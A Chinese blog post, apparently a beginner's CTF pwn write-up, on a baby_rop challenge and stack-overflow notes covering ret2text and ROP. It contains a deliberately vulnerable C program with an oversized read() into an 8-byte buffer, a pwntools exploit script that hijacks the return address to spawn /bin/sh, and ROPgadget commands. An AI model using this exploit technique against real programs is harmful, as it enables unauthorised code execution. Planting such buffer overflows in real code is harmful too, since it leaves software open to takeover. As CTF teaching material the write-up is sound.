pwn 01

最新推荐文章于 2024-07-22 14:49:16 发布
最新推荐文章于 2024-07-22 14:49:16 发布
阅读量1k 收藏 31
点赞数 39
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79970561/article/details/135968214
版权

1.baby_rop

用checksec查看文件,发现是六十四位

我们用ida打开,shift和f12查看字符串找到system以及/bin/sh,找到地址位置e322a78939f5450289ebddac425dadee.jpg

a67aefd4bf6345cb8408d63410140817.jpg 

3bcef5f7ae8c47a2b52a251a894d74b1.jpg 

 点击f5进行反编译,查看主函数

38d76572b2ae45b49f203992f9be5708.jpg

 最后编写脚本得到flag6b5bb51efdb049fa993bc1306779c394.jpg

 2.笔记整理

栈溢出


栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是

  • 程序必须向栈上写入数据。
  • 写入的数据大小没有控制好。

不同架构下的寄存器传参方式

64位

1.RDI (Destination Index): 用于传递第一个整数参数。

 

2.RSI (Source Index): 用于传递第二个整数参数。

 

3.RDX (Data Register): 用于传递第三个整数参数。

 

4.RCX (Counter Register): 用于传递第四个整数参数。

 

5.R8: 用于传递第五个整数参数。

 

6.R9: 用于传递第六个整数参数。

 

若参数超过6个,超过参数用栈传递

32位

参数直接使用栈传参

ret2text
原理
ret2text的原理是控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。

前置条件
1.程序存在栈溢出漏洞,可以覆盖返回地址。

2.程序.text段中存在可以执行恶意命令的代码片段,或者可以利用ROP技术拼接多个代码片段。

3.程序没有开启地址随机化或者可以泄露地址信息,可以确定代码片段的地址。

 

构造ROP传参


多数函数并不会直接将“shell = '/bin/sh'”这种危险字符串和system函数放在一起,此时就需要传参。

32位中构造ROP传参
#include<stdio.h>

#include<stdlib.h>

#include<unistd.h>

char shell[] = "/bin/sh";

int func(char *cmd){
    system(shell);

    return 0;

}

int dofunc(){
    char a[8]={};

    write(1,"inputs: ",7);

    read(0,a,0x100);

    return 0;

}

int main(){
    dofunc();

    return 0;

}

 

利用溢出覆盖返回地址进入func函数内部,再将参数一指向“/bin/sh”的储存地址即可。其中要注意的是r处需要我们进行垃圾数据的填充。

 

from pwn import *

#配置信息

context(log_level='debug',arch='i386',os='linux')

#context(arch='arm64',os='linux')

#打开路径

file = './ret2text_func2_x86'

io = process(file)

elf = ELF(file)

#注入信息

sh_addr = 0x804c018

#ret_addr = 0x8049186

ret_addr = elf.symbols['func']

padding = 0x14

payload = padding*b'a' + p32(ret_addr) + p32(0) + p32(sh_addr)

dem = b'inputs:'

io.sendlineafter(dem,payload)

io.interactive()

 

64位中构造ROP传参


对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。

ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。

知道了ROP工具的功能,我们需要做的是

1.修改rdi的值(可使用代码pop rdi ; ret)

2.在栈中放入‘bin/sh’经由pop提交给rdi

3.进入func函数内调用system函数

 利用ROPgadget查找需要的代码行--pop rdi ; ret

ROPgadget --binary ret2text_func2_x64 --only 'pop|ret'

也可用ropper查询。

ropper --file 文件名 --search "pop|ret"

FFF.F
关注
  • 39
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN入门01[攻防世界]
qq_43746493的博客
03-06 367
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 环境:Kali+IDA Freeware7.6(之前在Ubuntu20上安装IDA6.4,F5无法查看伪代码) 参考博文: https://blog.csdn.net/qq_39596232/article/details/100036147
[BUUCTF-pwn] whitehat2018_pwn01
weixin_52640415的博客
12-30 377
又是一个代码巨长的程序,前十页没有有用的东西 程序开了PIE但是直接给了地址,== no PIE 在sub_1178发现fgets(s, 230, stdin); 这里s定义是rbp-d0 可以溢出到reb 也就是可以在这移栈 int sub_1178() { void *v0; // rax char s[112]; // [rsp+0h] [rbp-D0h] BYREF char nptr[16]; // [rsp+70h] [rbp-60h] BYREF char s1[32]
linux_pwn0x01_fsb1
insomnia的博客
06-18 283
首先是源程序: #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { char a[1024]; while(1) { memset(a,'\0',1024); read(0,a,1024); printf(a); //the fsb vulnerabil...
linux pwn练习0x01
yusakul的博客
11-19 440
pwn练习的记录
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
【零基础学 IoT Pwn】系列的第二篇文章主要聚焦于复现Netgear WNAP320的远程代码执行(RCE)漏洞。Netgear WNAP320是一款企业级接入点设备,其固件版本2.0.3存在一个未认证的RCE漏洞,允许攻击者通过特定参数执行...
browser-pwn-advent-calendar
05-28
这个活动的结构类似日历,每天都会发布一个新的挑战,每个挑战都代表着一个特定的日期,如01、02和03。这些挑战涵盖了不同的主题和技术,例如及时更新、35C3 krautflare以及PCTF格子商店沙盒逃生。 首先,我们来看...
第二十节 Sqlmap系统参数-01
09-15
使用--os-pwn选项,Sqlmap可以与Metasploit集成,例如: ``` python sqlmap.py -u "注入点" --os-pwn ``` 这将使用Metasploit框架来攻击目标系统,实现更高级的攻击能力。 三、注册表介绍 注册表(Registry)是...
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
pwnPwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 布式文件:我们在CTF期间发供下载的tgz文件 以及比赛的比牌。 所有挑战都应具有挑战文件,源代码以及编写和/或求解器。 如果没有,请创建一个...
[pwn] 1.二进制基础
H4ppyD0g的博客
09-01 207
文章目录C语言源代码到可执行文件生成过程可执行文件类ELF文件格式静态链接和动态链接程序执行过程函数调用栈规则 C语言源代码到可执行文件生成过程 编译:C源代码-》汇编代码 汇编:汇编代码-》机器码 链接:多个目标机器码-》一个可执行文件 可执行文件类 windows:PE 可执行程序.exe 动态链接库.dll 静态链接库.lib linux:ELF 可执行文件.out 动态链接库.so 静态链接库.a ELF文件格式 ELF文件头表(ELF header) 程序头表(Program header
2019.7.21 pwn01 栈溢出的3种思路
DSR446的博客
08-02 272
这是一道简单的栈溢出的问题。下面简绍3种解法。 ①我们在IDA中查看s和a之间的距离,直接在利用gets函数的不安全性进行栈溢出覆盖a的值。 exp为: ②③ ...
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
一些关于Pwn的学习链接
Pwnpanda的博客
07-31 2384
暑假学习计划 - 0x01 最近整理一些有关Pwn的学习链接,同时也要感谢@某位小仙女的整理 以后应该还会继续更新一些 0x00 Pwn整体学习路线&amp;&amp;相关知识点 https://ctf-wiki.github.io/ctf-wiki/ 0x01 一步一步学ROP之linux_x86篇 – 蒸米 http://www.vuln.cn/6645 0x02 一步一步学ROP之...
Linux pwn入门教程(0)——环境配置
dfdhxb995397的博客
07-02 929
作者:Tangerine@SAINTSEC 0×00前言 作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的p...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1569
0x01 拿到题目之后首先析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
pwn1
u014281987的博客
08-27 966
坑:记住是/bin/sh,不是bin/sh啊啊啊 这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用 from pwn import * io=
pwn入门
九层台
03-27 1万+
之前学过一点关于pwn,不过总是断断续续,学一点就停止了,这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去 查看fd.c文件 main函数中:argc是命令行参数个数,char *argv[]是指所有命令行参数,char *envp[]是环境变量(argv[1]位置处存放的是命令行输入的第一个参数) atoi函数的作用是把字符转化为int型数据。 ...
Lianwei 安全周报|2024.07.22
最新发布
联蔚盘云的博客
07-22 567
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值